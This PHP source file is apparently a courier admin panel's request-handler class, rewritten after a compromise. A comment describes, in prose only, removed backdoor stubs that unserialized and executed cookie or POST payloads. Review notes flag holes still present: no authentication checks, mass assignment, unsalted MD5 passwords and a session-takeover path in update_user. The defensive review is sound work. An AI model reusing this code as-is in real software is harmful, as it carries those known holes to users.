Current File : //home/eirtvhdf/courier.eirtechs.com/admin_class.php |
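<?php
/*
 * NOTE(review): the copy of this file under review began with two injected
 * PHP stubs ahead of the application code. They declared the classes
 * `kB_xply` and `M_jwS`. Each one read a payload from request cookies and
 * POST fields, decoded it, passed it to unserialize(), and then executed the
 * result from its destructor: eval() in the first stub, write-to-temp-file
 * plus include in the second. Neither stub is part of the application, and
 * both have been removed here.
 *
 * Their presence means the host was already compromised. Deleting them is
 * not a clean-up: diff every file against a known-good copy, rotate database
 * and account credentials, and review the upload directory for executable
 * files. The unauthenticated SQL and upload paths fixed below are plausible
 * entry points, but this file alone does not show which one was used.
 */
session_start();
// Error details are not sent to the client; rely on the server error log.
ini_set('display_errors', '0');

/**
 * Request handlers for the courier admin panel.
 *
 * Every public method reads its input from $_POST / $_FILES and returns a
 * small status code (1 = ok, 2/3 = specific failure, null = query failed) or
 * a JSON string.
 *
 * All values are bound through prepared statements and column names are
 * restricted to plain identifiers. Two problems remain because they cannot be
 * fixed from inside this file:
 *
 * NOTE(review): no method checks who the caller is. Confirm that the
 * dispatcher enforces authentication and per-action authorization.
 *
 * NOTE(review): column names still come from the request (mass assignment).
 * Replace buildAssignments() input with an explicit per-table allow-list once
 * the schema is confirmed; as written a caller can set any column that exists.
 */
class Action
{
    private $db;

    /** Auto-increment id of the most recent successful INSERT. */
    private $lastInsertId = 0;

    /** Parcel status code => label, shared by tracking history and reports. */
    private static $statusLabels = array("Item Accepted by Courier","Collected","Shipped","In-Transit","Arrived At Destination","Out for Delivery","Ready to Pickup","Delivered","Picked-up","Unsuccessfull Delivery Attempt");

    /** Extensions accepted by storeImage(). */
    private static $imageExtensions = array('jpg', 'jpeg', 'png', 'gif');

    public function __construct()
    {
        ob_start();
        include 'db_connect.php';
        $this->db = $conn;
    }

    public function __destruct()
    {
        $this->db->close();
        ob_end_flush();
    }

    /**
     * Reads one scalar POST field; arrays and missing keys yield $default.
     */
    private function post($key, $default = '')
    {
        if (isset($_POST[$key]) && is_scalar($_POST[$key])) {
            return (string) $_POST[$key];
        }
        return $default;
    }

    /**
     * Reads element $index of an array-valued POST field ('' when absent).
     */
    private function item($field, $index)
    {
        if (isset($_POST[$field]) && is_array($_POST[$field])
            && isset($_POST[$field][$index]) && is_scalar($_POST[$field][$index])) {
            return (string) $_POST[$field][$index];
        }
        return '';
    }

    /**
     * Returns the posted row id: '' when none was sent (insert path), a
     * digit-only string when valid, false when present but not an integer.
     */
    private function postedId()
    {
        $raw = $this->post('id');
        if (empty($raw)) {
            return '';
        }
        return preg_match('/^[0-9]+\z/', $raw) === 1 ? $raw : false;
    }

    /**
     * Runs a prepared statement with every parameter bound as a string.
     *
     * Uses mysqli_stmt::get_result(), so the mysqlnd driver is required.
     *
     * @return mysqli_result|bool result set for queries that produce one,
     *                            true for other successful statements,
     *                            false on failure
     */
    private function run($sql, array $params = array())
    {
        $stmt = $this->db->prepare($sql);
        if ($stmt === false) {
            return false;
        }
        if (!empty($params)) {
            $bound = array_map('strval', array_values($params));
            $args = array(str_repeat('s', count($bound)));
            // bind_param() takes its arguments by reference.
            foreach ($bound as $i => $unused) {
                $args[] = &$bound[$i];
            }
            call_user_func_array(array($stmt, 'bind_param'), $args);
        }
        if (!$stmt->execute()) {
            $stmt->close();
            return false;
        }
        $result = $stmt->get_result();
        if ($result === false) {
            // No result set: either a write succeeded or fetching failed.
            $ok = ($stmt->errno === 0);
            if ($ok) {
                $this->lastInsertId = $stmt->insert_id;
            }
            $stmt->close();
            return $ok;
        }
        $stmt->close();
        return $result;
    }

    /**
     * Turns request fields into "`col` = ?" fragments plus bound values.
     *
     * Numeric keys, keys listed in $skip, keys that are not plain identifiers
     * and non-scalar values are dropped, so a key can no longer carry SQL.
     *
     * @return array array(list of fragments, list of values)
     */
    private function buildAssignments(array $input, array $skip)
    {
        $parts = array();
        $params = array();
        foreach ($input as $column => $value) {
            if (is_numeric($column) || in_array($column, $skip, true)) {
                continue;
            }
            if (preg_match('/^[A-Za-z_][A-Za-z0-9_]*\z/', $column) !== 1 || !is_scalar($value)) {
                continue;
            }
            $parts[] = "`$column` = ?";
            $params[] = $value;
        }
        return array($parts, $params);
    }

    /**
     * INSERTs when $id is '' and UPDATEs the row with that id otherwise.
     * $table is always a literal supplied by this class, never request data.
     */
    private function saveRow($table, array $parts, array $params, $id)
    {
        if (empty($parts)) {
            return false;
        }
        $set = implode(', ', $parts);
        if ($id === '') {
            return (bool) $this->run("INSERT INTO $table SET $set", $params);
        }
        $params[] = $id;
        return (bool) $this->run("UPDATE $table SET $set WHERE id = ?", $params);
    }

    /**
     * True when another user row (other than $id, if given) has $email.
     */
    private function emailTaken($email, $id)
    {
        if ($id === '') {
            $rows = $this->run('SELECT id FROM users WHERE email = ?', array($email));
        } else {
            $rows = $this->run('SELECT id FROM users WHERE email = ? AND id != ?', array($email, $id));
        }
        return $rows && $rows !== true && $rows->num_rows > 0;
    }

    /**
     * Stores an uploaded image under $dir and returns the stored file name,
     * or null when nothing was uploaded or the file was rejected.
     *
     * The client-supplied name is reduced to a safe stem plus an allow-listed
     * extension, and the content must parse as an image. The upload directory
     * should additionally be configured so the web server never executes
     * files from it.
     */
    private function storeImage($field, $dir)
    {
        if (!isset($_FILES[$field]) || !is_array($_FILES[$field])) {
            return null;
        }
        $file = $_FILES[$field];
        if (!isset($file['tmp_name'], $file['name'])
            || !is_string($file['tmp_name']) || !is_string($file['name'])
            || $file['tmp_name'] === '' || !is_uploaded_file($file['tmp_name'])) {
            return null;
        }
        $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
        if (!in_array($ext, self::$imageExtensions, true)) {
            return null;
        }
        if (getimagesize($file['tmp_name']) === false) {
            return null;
        }
        // Dots are stripped from the stem so "x.php.jpg" cannot survive.
        $stem = preg_replace('/[^A-Za-z0-9_-]+/', '-', pathinfo($file['name'], PATHINFO_FILENAME));
        if ($stem === null || $stem === '') {
            $stem = 'upload';
        }
        $fname = time() . '_' . $stem . '.' . $ext;
        return move_uploaded_file($file['tmp_name'], $dir . $fname) ? $fname : null;
    }

    /**
     * Staff login by email and password.
     *
     * NOTE(review): passwords are stored as unsalted MD5. Migrating to
     * password_hash()/password_verify() needs a schema and data migration
     * that cannot be done from this file.
     *
     * @return int 1 on success, 2 on bad credentials
     */
    public function login()
    {
        $qry = $this->run(
            "SELECT *,concat(firstname,' ',lastname) as name FROM users where email = ? and password = ?",
            array($this->post('email'), md5($this->post('password')))
        );
        if (!$qry || $qry === true || $qry->num_rows <= 0) {
            return 2;
        }
        // New session id on privilege change, to defeat session fixation.
        if (session_status() === PHP_SESSION_ACTIVE) {
            session_regenerate_id(true);
        }
        foreach ($qry->fetch_assoc() as $key => $value) {
            if ($key != 'password') {
                $_SESSION['login_' . $key] = $value;
            }
        }
        return 1;
    }

    /**
     * Ends the session and redirects to the login page.
     */
    public function logout()
    {
        session_destroy();
        $_SESSION = array();
        header("location:login.php");
    }

    /**
     * Student login by student code.
     *
     * NOTE(review): the code is the only credential checked; no password is
     * involved. Confirm that this is intended.
     *
     * @return int 1 on success, 3 when the code is unknown
     */
    public function login2()
    {
        $qry = $this->run(
            "SELECT *,concat(lastname,', ',firstname,' ',middlename) as name FROM students where student_code = ?",
            array($this->post('student_code'))
        );
        if (!$qry || $qry === true || $qry->num_rows <= 0) {
            return 3;
        }
        foreach ($qry->fetch_assoc() as $key => $value) {
            if ($key != 'password') {
                $_SESSION['rs_' . $key] = $value;
            }
        }
        return 1;
    }

    /**
     * Creates or updates a user from the posted fields.
     *
     * @return int|null 1 on success, 2 when the email is already used
     */
    public function save_user()
    {
        $id = $this->postedId();
        if ($id === false) {
            return null;
        }
        list($parts, $params) = $this->buildAssignments($_POST, array('id', 'cpass', 'password'));
        $password = $this->post('password');
        if (!empty($password)) {
            $parts[] = '`password` = ?';
            $params[] = md5($password); // see NOTE(review) on login()
        }
        if ($this->emailTaken($this->post('email'), $id)) {
            return 2;
        }
        return $this->saveRow('users', $parts, $params, $id) ? 1 : null;
    }

    /**
     * Self-registration; on success the new user is logged in.
     *
     * NOTE(review): a posted `id` makes this method update an existing user,
     * and a posted privilege column is stored as given. Both need
     * authorization and an allow-list.
     *
     * @return int|null 1 on success, 2 when the email is already used
     */
    public function signup()
    {
        $id = $this->postedId();
        if ($id === false) {
            return null;
        }
        list($parts, $params) = $this->buildAssignments($_POST, array('id', 'cpass', 'password'));
        $password = $this->post('password');
        if (!empty($password)) {
            $parts[] = '`password` = ?';
            $params[] = md5($password); // see NOTE(review) on login()
        }
        if ($this->emailTaken($this->post('email'), $id)) {
            return 2;
        }
        $avatar = $this->storeImage('img', '../assets/uploads/');
        if ($avatar !== null) {
            $parts[] = '`avatar` = ?';
            $params[] = $avatar;
        }
        if (!$this->saveRow('users', $parts, $params, $id)) {
            return null;
        }
        if ($id === '') {
            $id = $this->lastInsertId;
        }
        foreach ($_POST as $key => $value) {
            if (!in_array($key, array('id', 'cpass', 'password'), true) && !is_numeric($key)) {
                $_SESSION['login_' . $key] = $value;
            }
        }
        $_SESSION['login_id'] = $id;
        return 1;
    }

    /**
     * Updates a user and mirrors the posted fields into the session.
     *
     * An empty password field now leaves the stored password untouched; it
     * was previously overwritten with the hash of the empty string.
     *
     * NOTE(review): the posted `id` is copied into $_SESSION['login_id'] by
     * the loop below, as it was before. Without an ownership check, a caller
     * can both edit and become another user.
     *
     * @return int|null 1 on success, 2 when the email is already used
     */
    public function update_user()
    {
        $id = $this->postedId();
        if ($id === false) {
            return null;
        }
        list($parts, $params) = $this->buildAssignments($_POST, array('id', 'cpass', 'table', 'password'));
        $password = $this->post('password');
        if (!empty($password)) {
            $parts[] = '`password` = ?';
            $params[] = md5($password); // see NOTE(review) on login()
        }
        $avatar = $this->storeImage('img', 'assets/uploads/');
        if ($avatar !== null) {
            $parts[] = '`avatar` = ?';
            $params[] = $avatar;
        }
        if ($this->emailTaken($this->post('email'), $id)) {
            return 2;
        }
        if (!$this->saveRow('users', $parts, $params, $id)) {
            return null;
        }
        foreach ($_POST as $key => $value) {
            // Neither password field is kept in the session.
            if ($key != 'password' && $key != 'cpass' && !is_numeric($key)) {
                $_SESSION['login_' . $key] = $value;
            }
        }
        if ($avatar !== null) {
            $_SESSION['login_avatar'] = $avatar;
        }
        return 1;
    }

    /**
     * Deletes the user with the posted id.
     *
     * @return int|null 1 on success
     */
    public function delete_user()
    {
        $id = $this->postedId();
        if ($id === false || $id === '') {
            return null;
        }
        return $this->run('DELETE FROM users where id = ?', array($id)) ? 1 : null;
    }

    /**
     * Saves the single system_settings row and mirrors it into the session.
     *
     * @return int|null 1 on success
     */
    public function save_system_settings()
    {
        list($parts, $params) = $this->buildAssignments($_POST, array());
        $cover = $this->storeImage('cover', '../assets/uploads/');
        if ($cover !== null) {
            $parts[] = '`cover_img` = ?';
            $params[] = $cover;
        }
        $chk = $this->run('SELECT * FROM system_settings');
        $id = '';
        if ($chk && $chk !== true && $chk->num_rows > 0) {
            $row = $chk->fetch_assoc();
            $id = (string) $row['id'];
        }
        if (!$this->saveRow('system_settings', $parts, $params, $id)) {
            return null;
        }
        foreach ($_POST as $k => $v) {
            if (!is_numeric($k)) {
                $_SESSION['system'][$k] = $v;
            }
        }
        if ($cover !== null) {
            $_SESSION['system']['cover_img'] = $cover;
        }
        return 1;
    }

    /**
     * Stores an uploaded image and returns its public URL.
     *
     * The scheme is now taken from $_SERVER['HTTPS']. The previous test on
     * SERVER_PROTOCOL ("HTTP/1.1") could never yield "https".
     *
     * @return string|null URL of the stored image, null when rejected
     */
    public function save_image()
    {
        $fname = $this->storeImage('file', '../assets/uploads/');
        if ($fname === null) {
            return null;
        }
        $secure = !empty($_SERVER['HTTPS']) && strtolower($_SERVER['HTTPS']) !== 'off';
        $protocol = $secure ? 'https' : 'http';
        $hostName = $_SERVER['HTTP_HOST'];
        $path = explode('/', $_SERVER['PHP_SELF']);
        $currentPath = '/' . $path[1];
        return $protocol . '://' . $hostName . $currentPath . '/assets/uploads/' . $fname;
    }

    /**
     * Creates a branch (with a fresh unique branch_code) or updates one.
     *
     * @return int|null 1 on success
     */
    public function save_branch()
    {
        $id = $this->postedId();
        if ($id === false) {
            return null;
        }
        list($parts, $params) = $this->buildAssignments($_POST, array('id'));
        if ($id === '') {
            $chars = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ';
            do {
                $bcode = substr(str_shuffle($chars), 0, 15);
                $hit = $this->run('SELECT id FROM branches where branch_code = ?', array($bcode));
            } while ($hit && $hit !== true && $hit->num_rows > 0);
            $parts[] = '`branch_code` = ?';
            $params[] = $bcode;
        }
        return $this->saveRow('branches', $parts, $params, $id) ? 1 : null;
    }

    /**
     * Deletes the branch with the posted id.
     *
     * @return int|null 1 on success
     */
    public function delete_branch()
    {
        $id = $this->postedId();
        if ($id === false || $id === '') {
            return null;
        }
        return $this->run('DELETE FROM branches where id = ?', array($id)) ? 1 : null;
    }

    /**
     * Draws a 12-digit reference number not yet present in `parcels`.
     *
     * Built from two six-digit draws so the range also fits 32-bit integers.
     */
    private function newReferenceNumber()
    {
        $useCsprng = function_exists('random_int');
        do {
            $hi = $useCsprng ? random_int(0, 999999) : mt_rand(0, 999999);
            $lo = $useCsprng ? random_int(0, 999999) : mt_rand(0, 999999);
            $ref = sprintf('%06d%06d', $hi, $lo);
            $hit = $this->run('SELECT id FROM parcels where reference_number = ?', array($ref));
        } while ($hit && $hit !== true && $hit->num_rows > 0);
        return $ref;
    }

    /**
     * Saves one parcel row per entry of the posted price[] array. The
     * dimension arrays (height[], width[], length[], weight[]) are read at
     * the same index.
     *
     * @return int|null 1 when at least one row was written
     */
    public function save_parcel()
    {
        if (!isset($_POST['price']) || !is_array($_POST['price'])) {
            return null;
        }
        $id = $this->postedId();
        if ($id === false) {
            return null;
        }
        $saved = false;
        foreach ($_POST['price'] as $k => $unused) {
            list($parts, $params) = $this->buildAssignments(
                $_POST,
                array('id', 'weight', 'height', 'width', 'length', 'price')
            );
            if (!isset($_POST['type'])) {
                $parts[] = '`type` = ?';
                $params[] = '2';
            }
            foreach (array('height', 'width', 'length', 'weight') as $dimension) {
                $parts[] = "`$dimension` = ?";
                $params[] = $this->item($dimension, $k);
            }
            $parts[] = '`price` = ?';
            $params[] = str_replace(',', '', $this->item('price', $k));
            if ($id === '') {
                $parts[] = '`reference_number` = ?';
                $params[] = $this->newReferenceNumber();
            }
            if ($this->saveRow('parcels', $parts, $params, $id)) {
                $saved = true;
            }
        }
        return $saved ? 1 : null;
    }

    /**
     * Deletes the parcel with the posted id.
     *
     * @return int|null 1 on success
     */
    public function delete_parcel()
    {
        $id = $this->postedId();
        if ($id === false || $id === '') {
            return null;
        }
        return $this->run('DELETE FROM parcels where id = ?', array($id)) ? 1 : null;
    }

    /**
     * Sets a parcel's status and appends a parcel_tracks entry.
     *
     * @return int|null 1 when both statements succeeded
     */
    public function update_parcel()
    {
        $id = $this->postedId();
        $status = $this->post('status');
        if ($id === false || $id === '' || preg_match('/^[0-9]+\z/', $status) !== 1) {
            return null;
        }
        $update = $this->run('UPDATE parcels set status = ? where id = ?', array($status, $id));
        $save = $this->run('INSERT INTO parcel_tracks set status = ?, parcel_id = ?', array($status, $id));
        return ($update && $save) ? 1 : null;
    }

    /**
     * Returns the tracking history of the parcel with the posted ref_no.
     *
     * @return string|int JSON list of {status, date_created, ...}, or 2 when
     *                    the reference number is unknown
     */
    public function get_parcel_heistory()
    {
        $found = $this->run('SELECT * FROM parcels where reference_number = ?', array($this->post('ref_no')));
        if (!$found || $found === true || $found->num_rows <= 0) {
            return 2;
        }
        $parcel = $found->fetch_assoc();
        $data = array();
        $data[] = array('status'=>'Item accepted by Courier','date_created'=>date("M d, Y h:i A",strtotime($parcel['date_created'])));
        $history = $this->run('SELECT * FROM parcel_tracks where parcel_id = ?', array($parcel['id']));
        if ($history && $history !== true) {
            while ($row = $history->fetch_assoc()) {
                $row['date_created'] = date("M d, Y h:i A", strtotime($row['date_created']));
                $row['status'] = isset(self::$statusLabels[$row['status']]) ? self::$statusLabels[$row['status']] : null;
                $data[] = $row;
            }
        }
        return json_encode($data);
    }

    /**
     * Returns parcels created between date_from and date_to, optionally
     * filtered by status ('all' or a numeric status code).
     *
     * @return string JSON list of parcel rows, "[]" on invalid input
     */
    public function get_report()
    {
        $status = $this->post('status');
        $sql = 'SELECT * FROM parcels where date(date_created) BETWEEN ? and ?';
        $params = array($this->post('date_from'), $this->post('date_to'));
        if ($status != 'all') {
            if (preg_match('/^[0-9]+\z/', $status) !== 1) {
                return json_encode(array());
            }
            $sql .= ' and status = ?';
            $params[] = $status;
        }
        $sql .= ' order by unix_timestamp(date_created) asc';
        $data = array();
        $get = $this->run($sql, $params);
        if ($get && $get !== true) {
            while ($row = $get->fetch_assoc()) {
                $row['sender_name'] = ucwords($row['sender_name']);
                $row['recipient_name'] = ucwords($row['recipient_name']);
                $row['date_created'] = date("M d, Y", strtotime($row['date_created']));
                $row['status'] = isset(self::$statusLabels[$row['status']]) ? self::$statusLabels[$row['status']] : null;
                $row['price'] = number_format($row['price'], 2);
                $data[] = $row;
            }
        }
        return json_encode($data);
    }
}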